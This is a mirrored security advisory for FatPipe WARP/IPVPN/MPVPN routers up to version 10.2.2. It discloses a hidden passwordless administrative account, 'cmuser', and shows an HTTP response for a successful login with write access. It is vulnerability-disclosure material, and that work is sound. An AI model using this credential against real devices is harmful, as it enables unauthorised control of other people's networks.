Registerfatpipe networks warpipvpnmpvpn 10.2.2 hidden backdoor account (write access)
▸▸▸ Exploit & Vulnerability >> webapps exploit & hardware vulnerability
Online Vulnerability Scanner Tools
Code...
# Exploit Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access) # Date: 25.07.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.fatpipeinc.com FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Hidden Backdoor Account (Write Access) Vendor: FatPipe Networks Inc. Product web page: https://www.fatpipeinc.com Affected version: WARP / IPVPN / MPVPN 10.2.2r38 10.2.2r25 10.2.2r10 10.1.2r60p82 10.1.2r60p71 10.1.2r60p65 10.1.2r60p58s1 10.1.2r60p58 10.1.2r60p55 10.1.2r60p45 10.1.2r60p35 10.1.2r60p32 10.1.2r60p13 10.1.2r60p10 9.1.2r185 9.1.2r180p2 9.1.2r165 9.1.2r164p5 9.1.2r164p4 9.1.2r164 9.1.2r161p26 9.1.2r161p20 9.1.2r161p17 9.1.2r161p16 9.1.2r161p12 9.1.2r161p3 9.1.2r161p2 9.1.2r156 9.1.2r150 9.1.2r144 9.1.2r129 7.1.2r39 6.1.2r70p75-m 6.1.2r70p45-m 6.1.2r70p26 5.2.0r34 Summary: FatPipe Networks invented the concept of router-clustering, which provides the highest level of reliability, redundancy, and speed of Internet traffic for Business Continuity and communications. FatPipe WARP achieves fault tolerance for companies by creating an easy method of combining two or more Internet connections of any kind over multiple ISPs. FatPipe utilizes all paths when the lines are up and running, dynamically balancing traffic over the multiple lines, and intelligently failing over inbound and outbound IP traffic when ISP services and/or components fail. FatPipe IPVPN balances load and provides reliability among multiple managed and CPE based VPNs as well as dedicated private networks. FatPipe IPVPN can also provide you an easy low-cost migration path from private line, Frame or Point-to-Point networks. You can aggregate multiple private, MPLS and public networks without additional equipment at the provider's site. FatPipe MPVPN, a patented router clustering device, is an essential part of Disaster Recovery and Business Continuity Planning for Virtual Private Network (VPN) connectivity. It makes any VPN up to 900% more secure and 300% times more reliable, redundant and faster. MPVPN can take WANs with an uptime of 99.5% or less and make them 99.999988% or higher, providing a virtually infallible WAN. MPVPN dynamically balances load over multiple lines and ISPs without the need for BGP programming. MPVPN aggregates up to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed you need to keep your VPN up and running despite failures of service, line, software, or hardware. Desc: The application has a hidden administrative account 'cmuser' that has no password and has write access permissions to the device. The user cmuser is not visible in Users menu list of the application. Tested on: Apache-Coyote/1.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5684 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5684.php 30.05.2016 25.07.2021 -- Overview: FatPipe Central Manager is a secure web based solution providing a centralized solution to manage FatPipe's suite of WAN reliability and optimization products. Central Manager allows you to configure, manage and monitor FatPipe's patented MPSec technology at the click of a button. Central Manager = cmuser. Once authenticated, you get admin rights. HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Strict-Transport-Security: max-age=31536000 X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Content-Type: application/json;charset=ISO-8859-1 Content-Length: 118 Date: Fri, 06 Aug 2017 16:37:07 GMT Connection: close {"loginRes":"success","userName":"userName","userAccess":"writeAccess","activeUserName":"cmuser","message":"noError"}
Fatpipe networks warpipvpnmpvpn 10.2.2 hidden backdoor account (write access) Vulnerability / Exploit Source : Fatpipe networks warpipvpnmpvpn 10.2.2 hidden backdoor account (write access)
Last Vulnerability or Exploits
Easy integrations and simple setup help you start scanning in just some minutes